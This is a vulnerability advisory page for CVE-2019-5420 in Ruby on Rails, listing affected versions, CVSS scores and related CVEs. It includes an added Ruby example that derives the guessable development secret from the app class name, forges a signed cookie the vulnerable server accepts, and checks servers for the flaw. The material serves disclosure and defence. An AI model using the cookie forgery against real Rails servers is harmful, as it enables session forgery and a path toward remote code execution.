Vulnerability CVE-2019-5420


Published: 2019-03-27

Description:
A remote code execution vulnerability in development mode Rails <5.2.2.1 and <6.0.0.beta3 allows an attacker to guess the automatically generated development mode secret token (secret_key_base). That token can then be combined with other Rails internals to escalate to a remote code execution exploit.
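Added example, not code from the advisory or from the Rails project: a stdlib-only Ruby reconstruction of why the development secret was guessable and what knowing it buys an attacker. The pre-fix derivation (hex MD5 of the application class name, e.g. "Blog::Application"), the key-derivation parameters (PBKDF2-HMAC-SHA1, 1000 iterations, salt "signed cookie") and the MessageVerifier wire format ("base64--hexhmac") are taken from the Rails 5.2 source as the editor remembers it and are stated here as assumptions; the app name and the cookie payload are constructed. The example mirrors the signed-cookie path with a raw string payload (no serializer or metadata layer) and stops at "forged cookie accepted"; the further escalation to code execution that the advisory title refers to is outside it.

```ruby
require "digest"
require "openssl"
require "base64"
require "securerandom"
require "json"

# Assumption (reconstructed from Rails 5.2.x before 5.2.2.1, not from the
# advisory): with no secret configured, development/test mode derived
# secret_key_base as the hex MD5 of the application class name. Anyone who
# learns the app's module name can compute the same value.
def development_secret_before_fix(app_class_name)
  Digest::MD5.hexdigest(app_class_name)
end

# Shape of the fix: a random secret (Rails persists it under
# tmp/development_secret.txt so it survives restarts).
def development_secret_after_fix
  SecureRandom.hex(64)
end

# ActiveSupport::KeyGenerator as Rails::Application configures it
# (assumed): PBKDF2-HMAC-SHA1, 1000 iterations, 64-byte key per salt.
SIGNED_COOKIE_SALT = "signed cookie" # assumed Rails default signed_cookie_salt

def derive_key(secret_key_base, salt = SIGNED_COOKIE_SALT, size = 64)
  OpenSSL::PKCS5.pbkdf2_hmac_sha1(secret_key_base, salt, 1000, size)
end

# ActiveSupport::MessageVerifier wire format (assumed): strict Base64 of the
# payload, "--", hex HMAC-SHA1 of that Base64 text under the derived key.
def sign_cookie(key, payload)
  data = Base64.strict_encode64(payload)
  "#{data}--#{OpenSSL::HMAC.hexdigest("SHA1", key, data)}"
end

# Constant-time comparison so verification does not leak digest bytes.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Returns the payload when the signature verifies, nil otherwise.
def verify_cookie(key, cookie)
  data, digest = cookie.to_s.split("--", 2)
  return nil if data.nil? || digest.nil? || data.empty?
  expected = OpenSSL::HMAC.hexdigest("SHA1", key, data)
  return nil unless secure_compare(digest, expected)
  Base64.strict_decode64(data)
rescue ArgumentError
  nil
end

# Attacker side: knowing only the application class name, reproduce the
# victim's signing key and mint a cookie that the server will accept.
def forge_cookie_for(app_class_name, payload)
  sign_cookie(derive_key(development_secret_before_fix(app_class_name)), payload)
end

# Practitioner check: does a cookie captured from a server validate under
# the derivable development secret for this app name? If so, the server is
# running with the guessable secret.
def uses_guessable_dev_secret?(app_class_name, captured_cookie)
  !verify_cookie(derive_key(development_secret_before_fix(app_class_name)),
                 captured_cookie).nil?
end

def demo
  app_class = "Blog::Application"             # constructed app name
  payload = JSON.generate({ "user_id" => 1 }) # constructed sample payload

  # Vulnerable server: key derived from the class-name secret.
  vulnerable_key = derive_key(development_secret_before_fix(app_class))
  forged = forge_cookie_for(app_class, payload)
  forged_accepted = verify_cookie(vulnerable_key, forged) == payload

  # Patched server: random secret, so the same forgery is rejected.
  patched_key = derive_key(development_secret_after_fix)
  forged_rejected = verify_cookie(patched_key, forged).nil?

  { forged_accepted: forged_accepted,
    forged_rejected: forged_rejected,
    guessable: uses_guessable_dev_secret?(app_class, forged) }
end

puts demo.inspect if $PROGRAM_NAME == __FILE__
```

`uses_guessable_dev_secret?` is the check to run against a development instance that is reachable from outside: feed it a real cookie from the server and the candidate class name; a true result means the instance still derives its secret from the class name and should be upgraded or given an explicit secret_key_base.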

See advisories in our WLB2 database:
Risk | Topic | Author | Date
High | Ruby On Rails DoubleTap Development Mode secret_key_base Remote Code Execution | sinn3r | 02.05.2019

Type: CWE-20 (Improper Input Validation)

Vendor: Debian
Product: Debian linux
Version: 8.0
Vendor: Rubyonrails
Product: Rails
Versions:
6.0.0
5.2.3
5.2.2
5.2.1.1
5.2.1
5.2.0
5.1.7
5.1.6.2
5.1.6.1
5.1.6
5.1.5
5.1.4
5.1.3
5.1.2
5.1.1
5.1.0
5.0.7.2
5.0.7.1
5.0.7
5.0.6
5.0.5
5.0.4
5.0.3
5.0.2
5.0.1
5.0.0.1
5.0.0
4.2.9
4.2.8
4.2.7.1
4.2.7
4.2.6
4.2.5.2
4.2.5.1
4.2.5
4.2.4
4.2.3
4.2.2
4.2.11.1
4.2.11
4.2.10
4.2.1
4.2.0
4.1.9
4.1.8
4.1.7.1
4.1.7
4.1.6
4.1.5
4.1.4
4.1.3
4.1.2
4.1.16
4.1.15
4.1.14.2
4.1.14.1
4.1.14
4.1.13
4.1.12
4.1.11
4.1.10
4.1.1
4.1.0
4.0.9
4.0.8
4.0.7
4.0.6
4.0.5
4.0.4
4.0.3
4.0.2
4.0.13
4.0.12
4.0.11.1
4.0.11
4.0.10
4.0.1
4.0.0
3.2.9
3.2.8
3.2.7
3.2.6
3.2.5
3.2.4
3.2.3
3.2.22.5
3.2.22.4
3.2.22.3
3.2.22.2
3.2.22.1
3.2.22
3.2.21
3.2.20
3.2.2
3.2.19
3.2.18
3.2.17
3.2.16
3.2.15
See more versions on NVD

CVSS2 => (AV:N/AC:L/Au:N/C:P/I:P/A:P)

CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

References:
http://packetstormsecurity.com/files/152704/Ruby-On-Rails-DoubleTap-Development-Mode-secret_key_base-Remote-Code-Execution.html
https://groups.google.com/forum/#!topic/rubyonrails-security/IsQKvDqZdKw
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Y43636TH4D6T46IC6N2RQVJTRFJAAYGA/
https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/
https://www.exploit-db.com/exploits/46785/

Related CVE
CVE-2019-5419
There is a possible denial of service vulnerability in Action View (Rails) <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 where specially crafted accept headers can cause action view to consume 100% cpu and make the server unresponsive.
CVE-2019-5418
There is a File Content Disclosure vulnerability in Action View (Rails) <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 where specially crafted accept headers can cause contents of arbitrary files on the target system's filesystem to be exposed.
CVE-2018-16477
A bypass vulnerability in Active Storage >= 5.2.0 for Google Cloud Storage and Disk services allow an attacker to modify the `content-disposition` and `content-type` parameters which can be used in with HTML files and have them executed inline. Addit...
CVE-2018-16476
A Broken Access Control vulnerability in Active Job versions >= 4.2.0 allows an attacker to craft user input which can cause Active Job to deserialize it using GlobalId and give them access to information that they should not have. This vulnerability...
CVE-2018-3741
There is a possible XSS vulnerability in all rails-html-sanitizer gem versions below 1.0.4 for Ruby. The gem allows non-whitelisted attributes to be present in sanitized output when input with specially-crafted HTML fragments, and these attributes ca...
CVE-2017-17920
** DISPUTED ** SQL injection vulnerability in the 'reorder' method in Ruby on Rails 5.1.4 and earlier allows remote attackers to execute arbitrary SQL commands via the 'name' parameter. NOTE: The vendor disputes this issue because the documentation s...
CVE-2017-17919
** DISPUTED ** SQL injection vulnerability in the 'order' method in Ruby on Rails 5.1.4 and earlier allows remote attackers to execute arbitrary SQL commands via the 'id desc' parameter. NOTE: The vendor disputes this issue because the documentation ...
CVE-2017-17917
** DISPUTED ** SQL injection vulnerability in the 'where' method in Ruby on Rails 5.1.4 and earlier allows remote attackers to execute arbitrary SQL commands via the 'id' parameter. NOTE: The vendor disputes this issue because the documentation state...

Copyright 2019, cxsecurity.com